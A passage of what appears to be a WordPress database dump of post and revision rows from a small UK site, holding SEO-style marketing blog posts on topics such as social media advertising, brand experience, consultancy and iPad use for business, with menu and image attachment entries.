people balances remaining suitable and centre to the issue within which men and women obtain truly sacrificed their whole firms quickly given that Google has brought their visitors except for their website and as you recognize in the event you can\'t acquire website visitors you can not accomplish prospects and not having brings you cannot obtain a business.\r\n\r\nThere are plenty of of advantages for fb marketing lately that it is astounding! Facebook\'s pay per click marketing system helps you specialise in individuals by their pursuits as a way to convince particularly targeted customers for data inexpensive and then the cause the reason why you ought that can then be advertising on facebook great now is that cost-effective currently fb is definitely Google is in its early years &amp; riches have become to generally be produced. To earn over you commenced facebook marketing pay-per-click I created a video clip for understanding walking you thru tips on how to create your first ad; you can actually observe it on the net. Now fb pay-per-click is simply one benefit for marketing on facebook &amp; that is an advantage it actually is however acquire you found out about something recognized as social website marketing? Definitely it\'s likely you have, social networks are 21st century marketing actually in operation, making interactions, appeal advertising all that good stuff, well you can easily include social bookmarking using your fb pay-per-click by making an offer proper in your facebook fan web page which all over again creates connection. That is exclusively scrapping the counter with fb advertising when you get the connection constructing a some of it, expressing information, curiosity advertising that\'s in any league of that own along with all I even have provided in this time and age there is normally millions to get produced, deciding is yours.\r\n\r\nWeb Marketing Plus can offer you comprehensive advice regarding social media marketing. <a href=\"http://webmarketingplus.co.uk/specialist-advice.html\" target=\"_blank\" rel=\"noopener\">See the website for more information</a>!','Benefits associated with Facebook Marketing','','inherit','closed','closed','','5-revision-v1','','','2018-02-06 10:14:47','2018-02-06 10:14:47','',5,'https://ashbooks.co.uk/5-revision-v1',0,'revision','',0),(118,1,'2019-03-07 10:12:45','2019-03-07 10:12:45','Since the field of marketing is faced with tough competition several new technologies are introduced for attracting and convincing the consumer.\n\n<strong>One of such strategies is through brand experience.</strong> It is indeed a unique approach for marketing goods through this method. The consumer on the other side will directly get involved with the product both in an emotional way and rational way. The customer should feel the pleasure of using the product and it should not be thrust on him by force.\n\nUnless the manufacturers have a clear idea about the nature of the target audience he cannot succeed in marketing the product. First, they should know the pulse of his audience for whom the product is marketed.\n\nSome products are meant only for women and some others are marketed for children alone. Due to the availability of several options, any customer will choose the product which gives him the best feel and experience instead of settling down on one brand alone. <a href=\"https://www.ionos.com/digitalguide/online-marketing/online-sales/gender-marketing-definition-and-implementation/\" target=\"_blank\" rel=\"noopener\">What is gender marketing?</a>\n\n<em>The consumer will first look for quality and next, he would find out the best priced product. </em>\n\nFor instance, in the product of bathing soap alone, you have thousands of brand and shapes ranging from inexpensive soaps to the most expensive soap. Hence a consumer will think and select the ideal brand taking into account the quality and price of the product. A marketer can get an idea if he thinks from the perspective of a consumer.\n<h2>Improving the experience for customers</h2>\nProviding a clean and professional uniform for your employees can go a long way in presenting a smart and efficient team. When a customer approaches a member of staff in uniform, it gives a sense of consumer confidence as having the company\'s logo and name clearly stated shows that the business believes in their own products, services and everything else on offer. <a href=\"https://jppromotions.com.au/contact-us/\" target=\"_blank\" rel=\"noopener\">Click here</a> to contact a leading uniform supplier in WA.\n<h2>Concepts to include</h2>\nIt is necessary to bring in several concepts and new ideas for steering the pulse of the customer to use your product. Traditional marketing ideas will just create a virtual atmosphere of the product but now several companies are creating the real atmosphere so that the consumer can get the real feel of the product. <a href=\"https://iedunote.com/marketing-concept\" target=\"_blank\" rel=\"noopener\">Top marketing concepts</a>.\n\nWhile marketing, you have to engage all the senses of the audience to grab their attention. Include lot of powerful graphic elements in the advertisement for reaching the consumer quickly. It is possible to use the internet for spreading and marketing the new product free of cost.\n\nYou can now make use of <a href=\"https://www.convinceandconvert.com/content-marketing/secret-to-powerful-visual-content/\" target=\"_blank\" rel=\"noopener\">powerful visuals</a> to impress the audience visually. Once the product creates a good impression among the customers it will be hitting the market successfully. The idea of any marketing technique is to establish rapport between the consumers and the producers. If you have gained the confidence and support of the consumer, you can take it for granted that the consumer will come back to buy your product. By introducing the brand experience the marketer can create a good impression on the mindset of the audience which would certainly make an impact in buying the product.','Brand Experience Will Leave An Impact On The Consumer','','inherit','closed','closed','','7-autosave-v1','','','2019-03-07 10:12:45','2019-03-07 10:12:45','',7,'https://ashbooks.co.uk/7-autosave-v1',0,'revision','',0),(119,1,'2018-02-06 10:16:21','2018-02-06 10:16:21','Since the field of marketing is faced with tough competition several new technologies are introduced for attracting and convincing the consumer. One of such strategies is through brand experience. It is indeed a unique approach for marketing goods through this method. The consumer on the other side will directly get involved with the product both in emotional way and rational way. The customer should feel the pleasure of using the product and it should not be thrust on him by force.\r\n\r\nUnless the manufacturers have clear idea about the nature of the target audience he cannot succeed on marketing the product. First they should know the pulse of his audience for whom the product is marketed. Some products are meant only for women and some others are marketed for children alone. Due to the availability of several options any customer will choose the product which gives him the best feel and experience instead of settling down on one brand alone.\r\n\r\nThe consumer will first look for quality and next he would find out the best priced product. For instance in the product of bathing soap alone you have thousands of brand and shapes ranging from inexpensive soaps to the most expensive soap. Hence a consumer will think and select the ideal brand taking into account the quality and price of the product. A marketer can get an idea if he thinks from the perspective of a consumer. It is necessary to bring in several concepts and new ideas for steering the pulse of the customer to use your product. Traditional marketing ideas will just create a virtual atmosphere of the product but now several companies are creating the real atmosphere so that the consumer can get the real feel of the product.\r\n\r\nWhile marketing, you have to engage all the senses of the audience to grab their attention. Include lot of powerful graphic elements in the advertisement for reaching the consumer quickly. It is possible to use internet for spreading and marketing the new product free of cost. You can now make use of powerful visuals to impress the audience visually. Once the product creates a good impression among the customers it will be hitting the market successfully. The idea of any marketing technique is to establish rapport between the consumers and the producers. If you have gained the confidence and support of the consumer, you can take it for granted that the consumer will come back to buy your product. By introducing the brand experience the marketer can create a good impression on the mindset of audience which would certainly make an impact in buying the product.\r\n\r\nWrappz supply personalised products that are perfect for branding your business! They have a range of items for you to customise, including mugs, towels, keyrings, phone cases and laptop covers. Visit <a href=\"https://www.wrappz.com/\" target=\"_blank\" rel=\"noopener\">www.wrappz.com</a> for more.','Brand Experience Will Leave An Impact On The Consumer','','inherit','closed','closed','','7-revision-v1','','','2018-02-06 10:16:21','2018-02-06 10:16:21','',7,'https://ashbooks.co.uk/7-revision-v1',0,'revision','',0),(120,1,'2018-02-06 10:16:49','2018-02-06 10:16:49','There are pretty sound reasons to remain at the forefront as far as adopting new trends is concerned. It could present you with an edge over your rivals. Nothing seems better to a web-based company than an edge, most importantly when the Internet marketing can appear to be ruthless. Internet-based businesses are constantly venturing into a transforming world of search engine optimization and social networking. It means enjoying a means to stay ahead of the competitors. Please read on to know how Twitter marketing is the best thing that your web promotional efforts require.\n\nWhen you’re going to embrace a rapidly growing online marketing arena nowadays. Twitter already boasts 200 million active users – an ideal place to look for prospective customers if used precisely. Where it was rather tricky, Twitter has made it more straightforward than ever before to promote efficiently utilizing specific marketing program.\n\nStill, just how many internet marketers pay attention to this new trend of Twitter marketing? Think of what a lot of them could do with such powerful advertising tools. Executing these tools in your own company can help you save substantial amounts of time and ensure that you get that desired edge.\n\nTwitter has grown into one of the most effective social media programs around. Numerous individuals that include legislators, movie stars or even your next door neighbor are making use of Twitter to get connected and share with each other. This truth signifies that it is usually a significant marketing tool under the control of a sensible marketer. The main thing might be inside the quality of the follower lists or the contacts. They can frequently grow hurriedly, even exponentially. So when you advertise on Twitter, you can get a rapid and direct method to associate with similar individuals.\n\nMaking use of dedicated promotional software such as Tweet Adder, you can truly automate the procedure of getting the type of targeted Twitter users you necessitate to aid you in building up your exposure to moneymaking niche market members. Furthermore, it spares you plenty of time as well. It is merely one sort of tool. You can find others. Just look around and you will discover one that suits your requirements.\n\nWith an enquiry for users who have Tweeted specialized words, bio key phrases, or an utilization of their geographical location, the mentioned Twitter marketing software permits you that you can include these end users in your database directly. Think of having the capability to concentrate on many thousands of potential customers within just the span of moments. Hence, to advertise on Twitter, open an account in this social networking site straightway.','Advertise on Twitter to Take Advantage of this Powerful Marketing Tool','','inherit','closed','closed','','9-autosave-v1','','','2018-02-06 10:16:49','2018-02-06 10:16:49','',9,'https://ashbooks.co.uk/9-autosave-v1',0,'revision','',0),(121,1,'2018-02-06 10:17:29','2018-02-06 10:17:29','There are pretty sound reasons to remain at the forefront as far as adopting new trends is concerned. It could present you with an edge over your rivals. Nothing seems better to a web-based company than an edge, most importantly when the Internet marketing can appear to be ruthless. Internet-based businesses are constantly venturing into a transforming world of search engine optimization and social networking. It means enjoying a means to stay ahead of the competitors. Please read on to know how Twitter marketing is the best thing that your web promotional efforts require. Find out how to stay connected to your customers. <a href=\"http://googleplusblog.co.uk/services\" target=\"_blank\" rel=\"noopener\">Click here</a>.\r\n\r\nWhen you’re going to embrace a rapidly growing online marketing arena nowadays. Twitter already boasts 200 million active users – an ideal place to look for prospective customers if used precisely. Where it was rather tricky, Twitter has made it more straightforward than ever before to promote efficiently utilizing specific marketing program.\r\n\r\nStill, just how many internet marketers pay attention to this new trend of Twitter marketing? Think of what a lot of them could do with such powerful advertising tools. Executing these tools in your own company can help you save substantial amounts of time and ensure that you get that desired edge.\r\n\r\nTwitter has grown into one of the most effective social media programs around. Numerous individuals that include legislators, movie stars or even your next door neighbor are making use of Twitter to get connected and share with each other. This truth signifies that it is usually a significant marketing tool under the control of a sensible marketer. The main thing might be inside the quality of the follower lists or the contacts. They can frequently grow hurriedly, even exponentially. So when you advertise on Twitter, you can get a rapid and direct method to associate with similar individuals.\r\n\r\nMaking use of dedicated promotional software such as Tweet Adder, you can truly automate the procedure of getting the type of targeted Twitter users you necessitate to aid you in building up your exposure to moneymaking niche market members. Furthermore, it spares you plenty of time as well. It is merely one sort of tool. You can find others. Just look around and you will discover one that suits your requirements.\r\n\r\nWith an enquiry for users who have Tweeted specialized words, bio key phrases, or an utilization of their geographical location, the mentioned Twitter marketing software permits you that you can include these end users in your database directly. Think of having the capability to concentrate on many thousands of potential customers within just the span of moments. Hence, to advertise on Twitter, open an account in this social networking site straightway.','Advertise on Twitter to Take Advantage of this Powerful Marketing Tool','','inherit','closed','closed','','9-revision-v1','','','2018-02-06 10:17:29','2018-02-06 10:17:29','',9,'https://ashbooks.co.uk/9-revision-v1',0,'revision','',0),(122,1,'2018-02-06 10:18:36','2018-02-06 10:18:36','A social media agency should ideally plan and strategize methods to improve the rankings of your business in search engines.\r\n\r\nThe internet has changed the world in every way possible. Without it, the desktop computer would be just another glorified typewriter that also performs the additional function of processing facts quickly. It would certainly not have been the window that opens out every avenue there is to us. It has also changed forever the functioning of the business world today. Modern Marketing Tools Gone are the days when a business could retain its monopoly or retain its market presence through the printing and distribution of handbills or a few commercials on television. These days the most effective marketing tool around us is social media. Facebook and Twitter are the most popular social media platforms available today. A smart business person is one that employs the services of an effective Social Media Agency in order to become successful.\r\n\r\nThe people at whom the product or service is aimed discuss, network, share and participate by getting together online. Functions of a Social Media Company A social media company can make a business popular in almost no time at all. It does so by following certain basic principles; the most important one of which is to use the comments and views of the people online to direct the required traffic to the business. The more traffic diverted to your product, the better is the search engine ranking of your business. This is known as search engine optimization in turn generates positive results for your company.\r\n\r\nThe social media agency will also plan strategies on how to build your particular business online as well as devise ways to keep up the interest quotient of the viewers towards your business and make your service stand out among all the other competitors. Finding the Best Social Media Company for Your Business Different businesses require different agencies according to their specific needs. With so many of them available online, you will have to find the most suitable Social Media Agency for you by keeping the following points in mind · Go through all the agencies you think would be ideal for your business and shortlist the ones that you feel are most suitable to your business needs.\r\n\r\n· Read the case studies of the agencies that you have chosen and find out the ones that most meet your search criteria.\r\n\r\n· Read the testimonials of the other businesses that have used the services of these shortlisted agencies.\r\n\r\n· Select a Social Media Company that has a good reputation and business ethics.\r\n\r\nBear in mind at all times that the social media company you zero in on for your business will have a profound effect on its outcome. Once you have selected the right. for your business, rest assured there will be no looking back for your business.\r\n\r\n<a href=\"http://www.digitallydifferent.co.uk/types-of-advertising-media.html\" target=\"_blank\" rel=\"noopener\">Visit this website</a> to understand the types of advertising media!','Find The Best Social Media Company According To Your Need','','inherit','closed','closed','','15-revision-v1','','','2018-02-06 10:18:36','2018-02-06 10:18:36','',15,'https://ashbooks.co.uk/15-revision-v1',0,'revision','',0),(123,1,'2018-02-06 10:19:36','2018-02-06 10:19:36','Starting up your own business is something that can be very exciting and, at the same time, challenging due to several issues that you must face. In most cases, people tend to forget these issues as they are too pre-occupied with saving up for their investment. Fortunately, consultancy firms such as The Entrepreneur\'s Source can help business owners like you when it comes to your priorities and solving these issues. <a href=\"http://www.a1businessforums.co.uk/forum\" target=\"_blank\" rel=\"noopener\">Take a look at this business forum</a>.\r\n\r\nOne of the things consultancy businesses can do to help you is to open your eyes for you to see the truth behind the economy. While most people believe that their business can surely survive any financial difficulty along the way, consultancy firms will make you understand why and how it is possible. A consultancy business will provide better strategies which can help your business survive different forms of financial stress.\r\n\r\nConsultancy companies like the entrepreneur\'s source can also assist business owners in evaluating the different components of the company. Redundancies and deficiencies when it comes to roles of each employee are often assessed, including the strengths and weaknesses of the company. In order to come up with an accurate evaluation of a company’s potential, consultancy businesses use methods for each component of the company. Some consultancy businesses, such as The Entrepreneur\'s Source use methods recommended by their team of financial, communication, and behavioral analysts to assess the employees and the company’s overall performance.\r\n\r\nWhen it comes to maintaining a business, change is the only thing that is constant. A strategy that can work today may no longer work the next day due to several factors such as the volatility of the market, preferences of the clients, and efficiency of the employees. Companies should always be ready to embrace changes by being open to suggestions and adapt to changes by employing new strategies every now and then.\r\n\r\nConsultancy business can offer trainings and seminars for the members of the company to keep them updated and ready to handle changes that can either help or distract them in achieving their goal. If you are an owner or an employee working for a business, you must be aware of what a goal is. It is something that gives you and the entire business a favorable direction.\r\n\r\nBy using consultancy businesses like The Entrepreneur\'s Source, rest assured that your company can reach its goals. There may be obstacles along the way, but as long as you are making the right decision, then achieving the goal is always worth a try. Any type business with a consultancy firm by its side will surely stand out from the rest.','Consultancy Firms: Helping Businesses Achieve the Goal','','inherit','closed','closed','','23-revision-v1','','','2018-02-06 10:19:36','2018-02-06 10:19:36','',23,'https://ashbooks.co.uk/23-revision-v1',0,'revision','',0),(124,1,'2018-02-06 10:20:47','2018-02-06 10:20:47','We sometimes are confused by the believed regarding how to approach the disabled individual.\n\nWe love to regard their self esteem and want to extend our assist in each and every way possible. Nevertheless, a number of situations may be cited when our serious initiatives proceed futile and that we end up hurting their own self confidence. This is especially reflected in place of work, shopping malls and other public places exactly where all of us wind up making them feel substandard in order to other people. We quite often wind up discerning disabled people though we by no means intend to.\n\nA handicapped person is like every additional normal individual as well as desires other people to treat him or her this way.\n\nThis website also provides information that fights for rights for those that are disabled.\n\nA great number of organizations have offered and also have imparted disability awareness workout sessions to safeguard the interests associated with disabled individuals. Disability Equality training courses are designed to teach the most popular masses regarding emotions of handicapped individuals and the proper way to treat them. Providing disability equality training is completely required for individuals engaged in jobs where they\'re necessary to interact with clients directly. Seminars and workshop trainings are carried out and staffs are informed via interactive periods by using video clip, workbook and other online resources. It\'s important to follow a set of manners to have interaction along with handicapped people to ensure that we don\'t find themselves in discerning all of them. A good number of people avoid interacting with disabled individuals at all within stress they might end up in stating or even doing something that might hurt their self esteem. This frequently turns out to be counter productive. Like all other individual, disabled individuals prefer to mix within social groups and wouldn\'t appreciate being designated.\n\nThe culture suffers from typical misconceptions and misconceptions about impairment. It\'s a typical perception that the disabled individual offers vital self esteem which helps him conquer their incapability. The fact remains that a disabled person is very much an ordinary individual that performs the actual daily tasks with the help of attendant’s assistance. He requires impairment entry in public locations to carry out fundamental operations.\n\nA thorough understanding of Disability Discrimination act, 1995 is an imperative part of disability equality training course. It is absolutely essential for each organization to stick to disability Discrimination Act so as to avoid discrimination towards a disabled person.\n\nImparting disability equal rights instruction is absolutely crucial in workplace exactly where people through various avenues of life through different social backgrounds contact their own peers. Disability training ought to be included as a part of their induction so they stick to the organization norms if he or she communicates with the friend suffering from physical disability. This particular is true for every worker within the company including the management so that the handicapped employees don\'t in any way feel embarrassed by the carry out of the associates.','Disability and equality training- redefining life for disabled','','inherit','closed','closed','','27-autosave-v1','','','2018-02-06 10:20:47','2018-02-06 10:20:47','',27,'https://ashbooks.co.uk/27-autosave-v1',0,'revision','',0),(129,1,'2018-02-06 10:25:37','2018-02-06 10:25:37','','Home','','publish','closed','closed','','home','','','2018-02-06 10:25:37','2018-02-06 10:25:37','',0,'https://ashbooks.co.uk/home',1,'nav_menu_item','',0),(130,1,'2018-02-06 10:25:37','2018-02-06 10:25:37','','Contact Us','','publish','closed','closed','','contact-us','','','2018-02-06 10:25:37','2018-02-06 10:25:37','',0,'https://ashbooks.co.uk/contact-us',5,'nav_menu_item','',0),(131,1,'2018-02-06 10:25:37','2018-02-06 10:25:37',' ','','','publish','closed','closed','','131','','','2018-02-06 10:25:37','2018-02-06 10:25:37','',0,'https://ashbooks.co.uk/131',2,'nav_menu_item','',0),(132,1,'2018-02-06 10:25:38','2018-02-06 10:25:38',' ','','','publish','closed','closed','','132','','','2018-02-06 10:25:38','2018-02-06 10:25:38','',0,'https://ashbooks.co.uk/132',3,'nav_menu_item','',0),(133,1,'2018-02-06 10:25:38','2018-02-06 10:25:38',' ','','','publish','closed','closed','','133','','','2018-02-06 10:25:38','2018-02-06 10:25:38','',0,'https://ashbooks.co.uk/133',4,'nav_menu_item','',0),(135,1,'2018-08-31 11:16:56','2018-08-31 11:16:56','With the right apps, accessories and tools, the iPad can be a huge benefit to your business and can become your very own working machine.\r\n<h2>So, what is it that you need?</h2>\r\n<h3>Accessories:</h3>\r\n<strong>Case</strong>: there are hundreds of cases available that will need your business needs and style. iPad cases can vary in price depending on their design, durability and protective strength, so it is important to look around and see what\'s available. <a href=\"https://uk.pcmag.com/apple-ipad-2017/94259/gallery/the-best-ipad-cases\" target=\"_blank\" rel=\"noopener\">See best cases</a>.\r\n\r\n<strong>Keyboard &amp; stylus</strong>: There are two different types of keyboards that you can get. The first is a Bluetooth attachment and the other is an iPad ready keyboard which attaches via the smart connector. The <a href=\"https://www.apple.com/uk/apple-pencil/\" target=\"_blank\" rel=\"noopener\">stylus</a> is great for taking down notes and reminders during meetings, so it\'s a no brainer really.\r\n<h3>Apps:</h3>\r\n<strong><a href=\"https://technet.microsoft.com/en-us/library/office-365-proplus-office-applications-service-description.aspx\" target=\"_blank\" rel=\"noopener\">Microsoft Office</a></strong>: Microsoft has now brought out a range of apps that you can use as if you are using a computer including Word, Excel and PowerPoint. Being able to show your presentations without the need of your laptop is a game changer.\r\n\r\n<strong><a href=\"https://quickbooks.intuit.com/uk/\" target=\"_blank\" rel=\"noopener\">Quick Books</a></strong>: This app was designed to allow you to access your account from any location. You will also be able to processes invoices and keep to date with your account.\r\n\r\n<strong><a href=\"https://itunes.apple.com/gb/app/onedrive/id823766827?mt=12\" target=\"_blank\" rel=\"noopener\">One Drive</a></strong>:  This is a mobile friendly cloud storage system which can be used on your iPad. It is almost vital to have some sort of cloud storage when working from your iPad.\r\n<h3>What to keep in mind?</h3>\r\nAs you are using your iPad far more often than you may have thought, it is careful that you protect it as best as you can. If not, one drop of the floor can result in a smashed screen which may make it difficult to use.\r\n\r\nIf you are faced with this issue, we recommend visiting a reputable iPad repair agency that can offer you same day or next day repairs. This way, you can get back to work as soon as possible.\r\n\r\nFor fast iPad repairs in London, <a href=\"https://squarerepair.co.uk/collections/ipad-repair\" target=\"_blank\" rel=\"noopener\">visit Square Repair.</a>','Using Your iPad for Business','','publish','closed','closed','','using-your-ipad-for-business','','','2018-08-31 11:17:40','2018-08-31 11:17:40','',0,'https://ashbooks.co.uk/?p=135',0,'post','',0),(136,1,'2018-08-31 11:16:56','2018-08-31 11:16:56','With the right apps, accessories and tools, the iPad can be a huge benefit to your business and can become your very own working machine.\r\n<h2>So, what is it that you need?</h2>\r\n<h3>Accessories:</h3>\r\n<strong>Case</strong>: there are hundreds of cases available that will need your business needs and style. iPad cases can vary in price depending on their design, durability and protective strength, so it is important to look around and see what\'s available. <a href=\"https://uk.pcmag.com/apple-ipad-2017/94259/gallery/the-best-ipad-cases\" target=\"_blank\" rel=\"noopener\">See best cases</a>.\r\n\r\n<strong>Keyboard &amp; stylus</strong>: There are two different types of keyboards that you can get. The first is a Bluetooth attachment and the other is an iPad ready keyboard which attaches via the smart connector. The <a href=\"https://www.apple.com/uk/apple-pencil/\" target=\"_blank\" rel=\"noopener\">stylus</a> is great for taking down notes and reminders during meetings, so it\'s a no brainer really.\r\n<h3>Apps:</h3>\r\n<strong><a href=\"https://technet.microsoft.com/en-us/library/office-365-proplus-office-applications-service-description.aspx\" target=\"_blank\" rel=\"noopener\">Microsoft Office</a></strong>: Microsoft has now brought out a range of apps that you can use as if you are using a computer including Word, Excel and PowerPoint. Being able to show your presentations without the need of your laptop is a game changer.\r\n\r\n<strong><a href=\"https://quickbooks.intuit.com/uk/\" target=\"_blank\" rel=\"noopener\">Quick Books</a></strong>: This app was designed to allow you to access your account from any location. You will also be able to processes invoices and keep to date with your account.\r\n\r\n<strong><a href=\"https://itunes.apple.com/gb/app/onedrive/id823766827?mt=12\" target=\"_blank\" rel=\"noopener\">One Drive</a></strong>:  This is a mobile friendly cloud storage system which can be used on your iPad. It is almost vital to have some sort of cloud storage when working from your iPad.\r\n<h3>What to keep in mind?</h3>\r\nAs you are using your iPad far more often than you may have thought, it is careful that you protect it as best as you can. If not, one drop of the floor can result in a smashed screen which may make it difficult to use.\r\n\r\nIf you are faced with this issue, we recommend visiting a reputable iPad repair agency that can offer you same day or next day repairs. This way, you can get back to work as soon as possible.\r\n\r\nFor fast iPad repairs in London, <a href=\"https://squarerepair.co.uk/collections/ipad-repair\" target=\"_blank\" rel=\"noopener\">visit Square Repair.</a>','Using Your iPad for Business','','inherit','closed','closed','','135-revision-v1','','','2018-08-31 11:16:56','2018-08-31 11:16:56','',135,'https://ashbooks.co.uk/135-revision-v1',0,'revision','',0),(137,1,'2018-08-31 11:17:36','2018-08-31 11:17:36','','ipad-business','','inherit','closed','closed','','ipad-business','','','2018-08-31 11:17:36','2018-08-31 11:17:36','',135,'https://ashbooks.co.uk/wp-content/uploads/2018/08/ipad-business.jpg',0,'attachment','image/jpeg',0),(139,1,'2019-03-07 10:13:14','2019-03-07 10:13:14','','marketing-brainstorm','','inherit','closed','closed','','marketing-brainstorm','','','2019-03-07 10:13:14','2019-03-07 10:13:14','',7,'https://ashbooks.co.uk/wp-content/uploads/2018/02/marketing-brainstorm.jpg',0,'attachment','image/jpeg',0),(140,1,'2019-03-07 10:13:23','2019-03-07 10:13:23','Since the field of marketing is faced with tough competition several new technologies are introduced for attracting and convincing the consumer.\r\n\r\n<strong>One of such strategies is through brand experience.</strong> It is indeed a unique approach for marketing goods through this method. The consumer on the other side will directly get involved with the product both in an emotional way and rational way. The customer should feel the pleasure of using the product and it should not be thrust on him by force.\r\n\r\nUnless the manufacturers have a clear idea about the nature of the target audience he cannot succeed in marketing the product. First, they should know the pulse of his audience for whom the product is marketed.\r\n\r\nSome products are meant only for women and some others are marketed for children alone. Due to the availability of several options, any customer will choose the product which gives him the best feel and experience instead of settling down on one brand alone. <a href=\"https://www.ionos.com/digitalguide/online-marketing/online-sales/gender-marketing-definition-and-implementation/\" target=\"_blank\" rel=\"noopener\">What is gender marketing?</a>\r\n\r\n<em>The consumer will first look for quality and next, he would find out the best priced product. </em>\r\n\r\nFor instance, in the product of bathing soap alone, you have thousands of brand and shapes ranging from inexpensive soaps to the most expensive soap. Hence a consumer will think and select the ideal brand taking into account the quality and price of the product. A marketer can get an idea if he thinks from the perspective of a consumer.\r\n<h2>Improving the experience for customers</h2>\r\nProviding a clean and professional uniform for your employees can go a long way in presenting a smart and efficient team. When a customer approaches a member of staff in uniform, it gives a sense of consumer confidence as having the company\'s logo and name clearly stated shows that the business believes in their own products, services and everything else on offer. <a href=\"https://jppromotions.com.au/contact-us/\" target=\"_blank\" rel=\"noopener\">Click here</a> to contact a leading uniform supplier in WA.\r\n<h2>Concepts to include</h2>\r\nIt is necessary to bring in several concepts and new ideas for steering the pulse of the customer to use your product. Traditional marketing ideas will just create a virtual atmosphere of the product but now several companies are creating the real atmosphere so that the consumer can get the real feel of the product. <a href=\"https://iedunote.com/marketing-concept\" target=\"_blank\" rel=\"noopener\">Top marketing concepts</a>.\r\n\r\nWhile marketing, you have to engage all the senses of the audience to grab their attention. Include lot of powerful graphic elements in the advertisement for reaching the consumer quickly. It is possible to use the internet for spreading and marketing the new product free of cost.\r\n\r\nYou can now make use of <a href=\"https://www.convinceandconvert.com/content-marketing/secret-to-powerful-visual-content/\" target=\"_blank\" rel=\"noopener\">powerful visuals</a> to impress the audience visually. Once the product creates a good impression among the customers it will be hitting the market successfully. The idea of any marketing technique is to establish rapport between the consumers and the producers. If you have gained the confidence and support of the consumer, you can take it for granted that the consumer will come back to buy your product. By introducing the brand experience the marketer can create a good impression on the mindset of the audience which would certainly make an impact in buying the product.','Brand Experience Will Leave An Impact On The Consumer','','inherit','closed','closed','','7-revision-v1','','','2019-03-07 10:13:23','2019-03-07 10:13:23','',7,'https://ashbooks.co.uk/7-revision-v1',0,'revision','',0),(141,1,'2019-03-07 10:13:58','2019-03-07 10:13:58','','marketing-help','','inherit','closed','closed','','marketing-help','','','2019-03-07 10:14:05','2019-03-07 10:14:05','',7,'https://ashbooks.co.uk/wp-content/uploads/2019/02/marketing-help.jpg',0,'attachment','image/jpeg',0),(142,1,'2019-03-07 10:14:09','2019-03-07 10:14:09','Since the field of marketing is faced with tough competition several new technologies are introduced for attracting and convincing the consumer.\r\n\r\n<strong>One of such strategies is through brand experience.</strong> It is indeed a unique approach for marketing goods through this method. The consumer on the other side will directly get involved with the product both in an emotional way and rational way. The customer should feel the pleasure of using the product and it should not be thrust on him by force.\r\n\r\nUnless the manufacturers have a clear idea about the nature of the target audience he cannot succeed in marketing the product. First, they should know the pulse of his audience for whom the product is marketed.\r\n\r\nSome products are meant only for women and some others are marketed for children alone. Due to the availability of several options, any customer will choose the product which gives him the best feel and experience instead of settling down on one brand alone. <a href=\"https://www.ionos.com/digitalguide/online-marketing/online-sales/gender-marketing-definition-and-implementation/\" target=\"_blank\" rel=\"noopener\">What is gender marketing?</a>\r\n\r\n<em>The consumer will first look for quality and next, he would find out the best priced product. </em>\r\n\r\nFor instance, in the product of bathing soap alone, you have thousands of brand and shapes ranging from inexpensive soaps to the most expensive soap. Hence a consumer will think and select the ideal brand taking into account the quality and price of the product. A marketer can get an idea if he thinks from the perspective of a consumer.\r\n\r\n<img class=\"alignnone size-full wp-image-141\" src=\"https://ashbooks.co.uk/wp-content/uploads/2019/02/marketing-help.jpg\" alt=\"Marketing help and advice\" width=\"960\" height=\"624\" />\r\n<h2>Improving the experience for customers</h2>\r\nProviding a clean and professional uniform for your employees can go a long way in presenting a smart and efficient team. When a customer approaches a member of staff in uniform, it gives a sense of consumer confidence as having the company\'s logo and name clearly stated shows that the business believes in their own products, services and everything else on offer. <a href=\"https://jppromotions.com.au/contact-us/\" target=\"_blank\" rel=\"noopener\">Click here</a> to contact a leading uniform supplier in WA.\r\n<h2>Concepts to include</h2>\r\nIt is necessary to bring in several concepts and new ideas for steering the pulse of the customer to use your product. Traditional marketing ideas will just create a virtual atmosphere of the product but now several companies are creating the real atmosphere so that the consumer can get the real feel of the product. <a href=\"https://iedunote.com/marketing-concept\" target=\"_blank\" rel=\"noopener\">Top marketing concepts</a>.\r\n\r\nWhile marketing, you have to engage all the senses of the audience to grab their attention. Include lot of powerful graphic elements in the advertisement for reaching the consumer quickly. It is possible to use the internet for spreading and marketing the new product free of cost.\r\n\r\nYou can now make use of <a href=\"https://www.convinceandconvert.com/content-marketing/secret-to-powerful-visual-content/\" target=\"_blank\" rel=\"noopener\">powerful visuals</a> to impress the audience visually. Once the product creates a good impression among the customers it will be hitting the market successfully. The idea of any marketing technique is to establish rapport between the consumers and the producers. If you have gained the confidence and support of the consumer, you can take it for granted that the consumer will come back to buy your product. By introducing the brand experience the marketer can create a good impression on the mindset of the audience which would certainly make an impact in buying the product.','Brand Experience Will Leave An Impact On The Consumer','','inherit','closed','closed','','7-revision-v1','','','2019-03-07 10:14:09','2019-03-07 10:14:09','',7,'https://ashbooks.co.uk/7-revision-v1',0,'revision','',0),(144,1,'2019-06-18 15:34:33','2019-06-18 15:34:33','If your cables are strewn about all over the place, even if it is contained beneath the desk then any time is a good time to have it tidied up.\r\n<blockquote>On-site surveys can assess the current state of your cabling layout and point to any obvious health or performance risks.</blockquote>\r\nAny changes to your office layout, whether you are relocating desks during a move or simply placing new furniture, presents a good time to have an <a href=\"https://network-data-cabling.co.uk/under-desk-cable-management-services/\">under desk cable tidy.</a>\r\n\r\nThis ensures that once all the movement and arrangement is done, the cables are organised straightaway preventing the risk of tripping or lower network performance down the line.\r\n\r\nWhen you make changes to your IT equipment either by simply changing wires or increasing the size of your network, a cable tidy-up can ensure that you are getting the most out of the new equipment so your business can really feel the benefits.\r\n<h3>Can Tidying up Cables Really Boost Office Productivity?</h3>\r\nOf course! Streamlining the visibility of cables around the office will certainly help boost office productivity. Cables tend to be a magnet for dust, which can also lead to <a href=\"https://www.humana.com/learning-center/health-and-wellbeing/health-conditions/office-allergies\">involuntarily sneezes.</a>\r\n\r\nThe main purpose of using a desk cable tidy is to enhance the workspace around it. It has a <a href=\"https://www.amosbeech.com/blog/2018/5/9/key-tips-to-arrange-and-organise-your-office-to-enhance-comfort-and-productivity\">number of benefits</a> that include organisation and safety too.\r\n\r\n<strong>First impressions count.</strong> With property data cabling organisation, you’ll be able to project a clean, clear image to potential clients and to your workforce, which should see an increase in productivity.','What Is the Best Time for an Under Desk Cable Tidy?','','publish','closed','closed','','what-is-the-best-time-for-an-under-desk-cable-tidy','','','2019-06-18 15:34:33','2019-06-18 15:34:33','',0,'https://ashbooks.co.uk/?p=144',0,'post','',0),(145,1,'2019-06-18 15:34:12','2019-06-18 15:34:12','','desk-cable-tidy-service','','inherit','closed','closed','','desk-cable-tidy-service','','','2019-06-18 15:34:18','2019-06-18 